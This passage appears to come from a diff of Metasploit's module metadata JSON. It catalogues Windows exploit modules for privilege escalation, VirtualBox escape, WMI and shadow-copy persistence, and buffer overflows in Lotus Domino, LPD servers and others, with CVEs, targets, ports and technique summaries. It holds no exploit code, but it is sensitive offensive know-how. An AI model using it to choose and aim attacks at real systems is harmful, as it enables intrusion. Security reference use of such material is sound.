The attack can be triggered by any\n low-privileged user and does not require a system reboot.\n\n This module has been successfully tested on Windows Server 2012 (x64).", - "references": [ - "URL-https://blog.vonahi.io/srclient-dll-hijacking" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Server 2012 (x64)" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/local/srclient_dll_hijacking.rb", - "is_install_path": true, - "ref_name": "windows/local/srclient_dll_hijacking", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs", - "screen-effects" - ], - "Reliability": [ - "unreliable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/tokenmagic": { - "name": "Windows Privilege Escalation via TokenMagic (UAC Bypass)", - "fullname": "exploit/windows/local/tokenmagic", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-05-25", - "type": "exploit", - "author": [ - "James Forshaw", - "Ruben Boonen ( ", - "bwatters-r7", - "jheysel-r7" - ], - "description": "This module leverages a UAC bypass (TokenMagic) in order to spawn a process/conduct a DLL\n hijacking attack to gain SYSTEM-level privileges. 
Windows 7 through Windows 10 1803\n are affected.", - "references": [ - "URL-https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1", - "URL-https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html", - "URL-https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html", - "URL-https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/tokenmagic.rb", - "is_install_path": true, - "ref_name": "windows/local/tokenmagic", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/unquoted_service_path": { - "name": "Windows Unquoted Service Path Privilege Escalation", - "fullname": "exploit/windows/local/unquoted_service_path", - "aliases": [], - "rank": 500, - "disclosure_date": "2001-10-25", - "type": "exploit", - "author": [ - "sinn3r ", - "h00die" - ], - "description": "This module exploits a logic flaw due to how the lpApplicationName parameter\n is handled. When the lpApplicationName contains a space, the file name is\n ambiguous. 
Take this file path as example: C:\\program files\\hello.exe;\n The Windows API will try to interpret this as two possible paths:\n C:\\program.exe, and C:\\program files\\hello.exe, and then execute all of them.\n To some software developers, this is an unexpected behavior, which becomes a\n security problem if an attacker is able to place a malicious executable in one\n of these unexpected paths, sometimes escalate privileges if run as SYSTEM.\n Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the\n same problem.\n\n The offensive technique is also described in Writing Secure Code (2nd Edition),\n Chapter 23, in the section \"Calling Processes Security\" on page 676.\n\n This technique was previously called Trusted Service Path, but is more commonly\n known as Unquoted Service Path.\n\n The service exploited won't start until the payload written to disk is removed.", - "references": [ - "URL-http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx", - "URL-http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us", - "URL-https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2025-04-13 16:34:03 +0000", - "path": "/modules/exploits/windows/local/unquoted_service_path.rb", - "is_install_path": true, - "ref_name": "windows/local/unquoted_service_path", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "artifacts-on-disk", - "config-changes" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/virtual_box_guest_additions": { - "name": "VirtualBox Guest Additions VBoxGuest.sys Privilege 
Escalation", - "fullname": "exploit/windows/local/virtual_box_guest_additions", - "aliases": [], - "rank": 200, - "disclosure_date": "2014-07-15", - "type": "exploit", - "author": [ - "Matt Bergin ", - "Jay Smith " - ], - "description": "A vulnerability within the VBoxGuest driver allows an attacker to inject memory they\n control into an arbitrary location they define. This can be used by an attacker to\n overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\n NtQueryIntervalProfile on Windows XP SP3 systems. This has been tested with VBoxGuest\n Additions up to 4.3.10r93012.", - "references": [ - "CVE-2014-2477", - "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/virtual_box_guest_additions.rb", - "is_install_path": true, - "ref_name": "windows/local/virtual_box_guest_additions", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/virtual_box_opengl_escape": { - "name": "VirtualBox 3D Acceleration Virtual Machine Escape", - "fullname": "exploit/windows/local/virtual_box_opengl_escape", - "aliases": [], - "rank": 200, - "disclosure_date": "2014-03-11", - "type": "exploit", - "author": [ - "Francisco Falcon", - "Florian Ledoux", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The\n vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a\n sequence of specially crafted rendering messages, a virtual machine can exploit an out\n of bounds array access to corrupt memory and escape to the host. 
This module has been\n tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6.", - "references": [ - "CVE-2014-0983", - "BID-66133", - "URL-http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities", - "URL-http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/virtual_box_opengl_escape.rb", - "is_install_path": true, - "ref_name": "windows/local/virtual_box_opengl_escape", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/vss_persistence": { - "name": "Persistent Payload in Windows Volume Shadow Copy", - "fullname": "exploit/windows/local/vss_persistence", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-10-21", - "type": "exploit", - "author": [ - "Jedediah Rodriguez " - ], - "description": "This module will attempt to create a persistent payload in a new volume shadow copy. This is\n based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has\n been tested successfully on Windows 7. 
In order to achieve persistence through the RUNKEY\n option, the user should need password in order to start session on the target machine.", - "references": [ - "URL-https://web.archive.org/web/20201111212952/https://securityweekly.com/2011/11/02/safely-dumping-hashes-from-liv/", - "URL-http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Windows" - ], - "mod_time": "2022-10-01 17:54:59 +0000", - "path": "/modules/exploits/windows/local/vss_persistence.rb", - "is_install_path": true, - "ref_name": "windows/local/vss_persistence", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "config-changes" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/webexec": { - "name": "WebEx Local Service Permissions Exploit", - "fullname": "exploit/windows/local/webexec", - "aliases": [], - "rank": 400, - "disclosure_date": "2018-10-09", - "type": "exploit", - "author": [ - "Jeff McJunkin " - ], - "description": "This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM,\n can be used to run arbitrary commands locally, and can be started by limited users in\n default installations.", - "references": [ - "URL-https://webexec.org", - "CVE-2018-15442" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows x86", - "Windows x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/local/webexec.rb", - "is_install_path": true, - "ref_name": "windows/local/webexec", - "check": true, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/win_error_cve_2023_36874": { - "name": "Microsoft Error Reporting Local Privilege Elevation Vulnerability", - "fullname": "exploit/windows/local/win_error_cve_2023_36874", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-07-11", - "type": "exploit", - "author": [ - "Filip Dragović (Wh04m1001)", - "Octoberfest7", - "bwatters-r7" - ], - "description": "This module takes advantage of a bug in the way Windows error reporting opens the report\n parser. If you open a report, Windows uses a relative path to locate the rendering program.\n By creating a specific alternate directory structure, we can coerce Windows into opening an\n arbitrary executable as SYSTEM.\n If the current user is a local admin, the system will attempt impersonation and the exploit will\n fail.", - "references": [ - "CVE-2023-36874", - "URL-https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/", - "URL-https://github.com/Wh04m1001/CVE-2023-36874", - "URL-https://github.com/Octoberfest7/CVE-2023-36874_BOF" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-09-27 09:43:32 +0000", - "path": "/modules/exploits/windows/local/win_error_cve_2023_36874.rb", - "is_install_path": true, - "ref_name": "windows/local/win_error_cve_2023_36874", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/windscribe_windscribeservice_priv_esc": { - "name": "Windscribe WindscribeService Named Pipe Privilege 
Escalation", - "fullname": "exploit/windows/local/windscribe_windscribeservice_priv_esc", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-05-24", - "type": "exploit", - "author": [ - "Emin Ghuliev", - "bcoles " - ], - "description": "The Windscribe VPN client application for Windows makes use of a\n Windows service `WindscribeService.exe` which exposes a named pipe\n `\\.\\pipe\\WindscribeService` allowing execution of programs with\n elevated privileges.\n\n Windscribe versions prior to 1.82 do not validate user-supplied\n program names, allowing execution of arbitrary commands as SYSTEM.\n\n This module has been tested successfully on Windscribe versions\n 1.80 and 1.81 on Windows 7 SP1 (x64).", - "references": [ - "CVE-2018-11479", - "URL-http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html", - "URL-https://pastebin.com/eLG3dpYK" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb", - "is_install_path": true, - "ref_name": "windows/local/windscribe_windscribeservice_priv_esc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/wmi": { - "name": "Windows Management Instrumentation (WMI) Remote Command Execution", - "fullname": "exploit/windows/local/wmi", - "aliases": [], - "rank": 600, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "Ben Campbell " - ], - "description": "This module executes powershell on the remote host using the current\n user credentials or those supplied. 
Instead of using PSEXEC over TCP\n port 445 we use the WMIC command to start a Remote Procedure Call on\n TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel\n traffic through that session.\n\n The result is similar to psexec but with the added benefit of using\n the session's current authentication token instead of having to know\n a password or hash.\n\n The remote host must be configured to allow remote Windows Management\n Instrumentation.", - "references": [ - "CVE-1999-0504", - "OSVDB-3106", - "URL-http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2022-09-23 17:41:20 +0000", - "path": "/modules/exploits/windows/local/wmi.rb", - "is_install_path": true, - "ref_name": "windows/local/wmi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/wmi_persistence": { - "name": "WMI Event Subscription Persistence", - "fullname": "exploit/windows/local/wmi_persistence", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-06-06", - "type": "exploit", - "author": [ - "Nick Tyrer <@NickTyrer>" - ], - "description": "This module will create a permanent WMI event subscription to achieve file-less persistence using one\n of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER\n (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing\n must be enabled on the target for this method to work, this can be enabled using \"auditpol.exe /set /subcategory:Logon\n /failure:Enable\"). 
When these criteria are met a command line event consumer will trigger an encoded powershell payload.\n The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON\n method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS\n method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method\n creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER\n before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command\n (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is\n activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a\n high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations.", - "references": [ - "URL-https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf", - "URL-https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2024-03-12 12:17:46 +0000", - "path": "/modules/exploits/windows/local/wmi_persistence.rb", - "is_install_path": true, - "ref_name": "windows/local/wmi_persistence", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/lotus/domino_http_accept_language": { - "name": "IBM Lotus Domino Web Server 
Accept-Language Stack Buffer Overflow", - "fullname": "exploit/windows/lotus/domino_http_accept_language", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-05-20", - "type": "exploit", - "author": [ - "Fairuzan Roslan ", - "Earl Marcus klks " - ], - "description": "This module exploits a stack buffer overflow in IBM Lotus Domino Web Server\n prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP\n request with an Accept-Language header greater than 114 bytes.", - "references": [ - "CVE-2008-2240", - "OSVDB-45415", - "BID-29310", - "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21303057" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Lotus Domino 7.0 on Windows 2003 SP1 English(NX)", - "Lotus Domino 7.0 on Windows 2003 SP2 English(NX)", - "Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)", - "Lotus Domino 8.0 on Windows 2003 SP1 English(NX)", - "Lotus Domino 8.0 on Windows 2003 SP2 English(NX)", - "Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lotus/domino_http_accept_language.rb", - "is_install_path": true, - "ref_name": "windows/lotus/domino_http_accept_language", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/lotus/domino_icalendar_organizer": { - "name": "IBM Lotus Domino iCalendar MAILTO Buffer Overflow", - "fullname": "exploit/windows/lotus/domino_icalendar_organizer", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-09-14", - "type": "exploit", - "author": [ - "A. Plaskett", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in IBM Lotus Domino iCalendar. 
By\n sending a long string of data as the \"ORGANIZER;mailto\" header, process \"nRouter.exe\"\n crashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to\n gain arbitrary code execution.\n\n Note: In order to trigger the vulnerable code path, a valid Domino mailbox account\n is needed.", - "references": [ - "CVE-2010-3407", - "OSVDB-68040", - "ZDI-10-177", - "URL-http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/", - "URL-http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Lotus Domino 8.5 on Windows 2000 SP4", - "Lotus Domino 8.5 on Windows Server 2003 SP0", - "Lotus Domino 8.5 on Windows Server 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lotus/domino_icalendar_organizer.rb", - "is_install_path": true, - "ref_name": "windows/lotus/domino_icalendar_organizer", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/lotus/domino_sametime_stmux": { - "name": "IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow", - "fullname": "exploit/windows/lotus/domino_sametime_stmux", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-05-21", - "type": "exploit", - "author": [ - "aushack ", - "riaf " - ], - "description": "This module exploits a stack buffer overflow in Lotus Domino\\'s Sametime\n Server. By sending an overly long POST request to the Multiplexer\n STMux.exe service we are able to overwrite SEH. 
Based on the exploit\n by Manuel Santamarina Suarez.", - "references": [ - "CVE-2008-2499", - "OSVDB-45610", - "BID-29328", - "ZDI-08-028" - ], - "platform": "Windows", - "arch": "x86", - "rport": 1533, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Lotus Sametime 7.5 on Windows Server 2000 SP4", - "Lotus Sametime 7.5 on Windows Server 2003 SP1", - "Lotus Sametime 7.5 on Windows Server 2003 SP2", - "Lotus Sametime 7.5.1 Windows Server 2003 SP2", - "Lotus Sametime 8.0.0 Windows Server 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lotus/domino_sametime_stmux.rb", - "is_install_path": true, - "ref_name": "windows/lotus/domino_sametime_stmux", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/lotus/lotusnotes_lzh": { - "name": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)", - "fullname": "exploit/windows/lotus/lotusnotes_lzh", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-05-24", - "type": "exploit", - "author": [ - "binaryhouse.net", - "alino <26alino@gmail.com>" - ], - "description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. 
This vulnerability was\n discovered binaryhouse.net", - "references": [ - "CVE-2011-1213", - "OSVDB-72706", - "BID-48018", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904", - "URL-http://www.ibm.com/support/docview.wss?uid=swg21500034" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": [ - "Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal", - "Lotus Notes 8.5.2 FP2 / Windows Universal / DEP" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lotus/lotusnotes_lzh.rb", - "is_install_path": true, - "ref_name": "windows/lotus/lotusnotes_lzh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/lpd/hummingbird_exceed": { - "name": "Hummingbird Connectivity 10 SP5 LPD Buffer Overflow", - "fullname": "exploit/windows/lpd/hummingbird_exceed", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-05-27", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Hummingbird Connectivity\n 10 LPD Daemon. 
This module has only been tested against Hummingbird\n Exceed v10 with SP5.", - "references": [ - "CVE-2005-1815", - "OSVDB-16957", - "BID-13788" - ], - "platform": "Windows", - "arch": "", - "rport": 515, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 English SP0-SP4", - "Windows XP English SP0/SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lpd/hummingbird_exceed.rb", - "is_install_path": true, - "ref_name": "windows/lpd/hummingbird_exceed", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/lpd/niprint": { - "name": "NIPrint LPD Request Overflow", - "fullname": "exploit/windows/lpd/niprint", - "aliases": [], - "rank": 400, - "disclosure_date": "2003-11-05", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the\n Network Instrument NIPrint LPD service. 
Inspired by\n Immunity's VisualSploit :-)", - "references": [ - "CVE-2003-1141", - "OSVDB-2774", - "BID-8968", - "URL-http://www.immunitysec.com/documentation/vs_niprint.html" - ], - "platform": "Windows", - "arch": "", - "rport": 515, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "NIPrint3.EXE (TDS:0x3a045ff2)", - "Windows XP SP3", - "Windows 7 x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lpd/niprint.rb", - "is_install_path": true, - "ref_name": "windows/lpd/niprint", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/lpd/saplpd": { - "name": "SAP SAPLPD 6.28 Buffer Overflow", - "fullname": "exploit/windows/lpd/saplpd", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-02-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40) .\n By sending an overly long argument, an attacker may be able to execute arbitrary\n code.", - "references": [ - "CVE-2008-0621", - "OSVDB-41127", - "BID-27613" - ], - "platform": "Windows", - "arch": "", - "rport": 515, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "SAPlpd 6.28.0.1 (SAP Release 6.40)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lpd/saplpd.rb", - "is_install_path": true, - "ref_name": "windows/lpd/saplpd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/lpd/wincomlpd_admin": { - "name": "WinComLPD Buffer Overflow", - "fullname": "exploit/windows/lpd/wincomlpd_admin", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-02-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in WinComLPD <= 3.0.2.\n By 
sending an overly long authentication packet to the remote\n administration service, an attacker may be able to execute arbitrary\n code.", - "references": [ - "CVE-2008-5159", - "OSVDB-42861", - "BID-27614" - ], - "platform": "Windows", - "arch": "", - "rport": 13500, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "WinComLPD 3.0.2.623" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/lpd/wincomlpd_admin.rb", - "is_install_path": true, - "ref_name": "windows/lpd/wincomlpd_admin", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/achat_bof": { - "name": "Achat Unicode SEH Buffer Overflow", - "fullname": "exploit/windows/misc/achat_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-12-18", - "type": "exploit", - "author": [ - "Peter Kasza ", - "Balazs Bucsay " - ], - "description": "This module exploits a Unicode SEH buffer overflow in Achat. By\n sending a crafted message to the default port 9256/UDP, it's possible to overwrite the\n SEH handler. Even when the exploit is reliable, it depends on timing since there are\n two threads overflowing the stack in the same time. 
This module has been tested on\n Achat v0.150 running on Windows XP SP3 and Windows 7.", - "references": [ - "CWE-121" - ], - "platform": "Windows", - "arch": "", - "rport": 9256, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/achat_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/achat_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/actfax_raw_server_bof": { - "name": "ActFax 5.01 RAW Server Buffer Overflow", - "fullname": "exploit/windows/misc/actfax_raw_server_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-02-05", - "type": "exploit", - "author": [ - "Craig Freyman", - "corelanc0d3r", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW\n Server can be used to transfer fax messages without any underlying protocols. To\n note significant fields in the fax being transferred, like the fax number or the\n recipient, ActFax data fields can be used. This module exploits a buffer overflow\n in the handling of the @F506 fields due to the insecure usage of strcpy. 
This\n module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).", - "references": [ - "OSVDB-89944", - "BID-57789", - "EDB-24467", - "URL-http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ActFax 5.01 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/actfax_raw_server_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/actfax_raw_server_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/agentxpp_receive_agentx": { - "name": "AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow", - "fullname": "exploit/windows/misc/agentxpp_receive_agentx", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-04-16", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This exploits a stack buffer overflow in the AgentX++ library, as used by\n various applications. By sending a specially crafted request, an attacker can\n execute arbitrary code, potentially with SYSTEM privileges.\n\n This module was tested successfully against master.exe as included with Real\n Network\\'s Helix Server v12. When installed as a service with Helix Server,\n the service runs as SYSTEM, has no recovery action, but will start automatically\n on boot.\n\n This module does not work with NX/XD enabled but could be modified easily to\n do so. 
The address", - "references": [ - "CVE-2010-1318", - "OSVDB-63919", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867" - ], - "platform": "Windows", - "arch": "", - "rport": 705, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Helix Server v12 and v13 - master.exe" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/agentxpp_receive_agentx.rb", - "is_install_path": true, - "ref_name": "windows/misc/agentxpp_receive_agentx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ahsay_backup_fileupload": { - "name": "Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload", - "fullname": "exploit/windows/misc/ahsay_backup_fileupload", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-06-01", - "type": "exploit", - "author": [ - "Wietse Boonstra" - ], - "description": "This module exploits an authenticated insecure file upload and code\n execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute\n the upload credentials are needed, default on Ahsay Backup trial\n accounts are enabled so an account can be created.\n\n It can be exploited in Windows and Linux environments to get remote code\n execution (usualy as SYSTEM). This module has been tested successfully\n on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this\n flaw all connected clients can be configured to execute a command before\n the backup starts. 
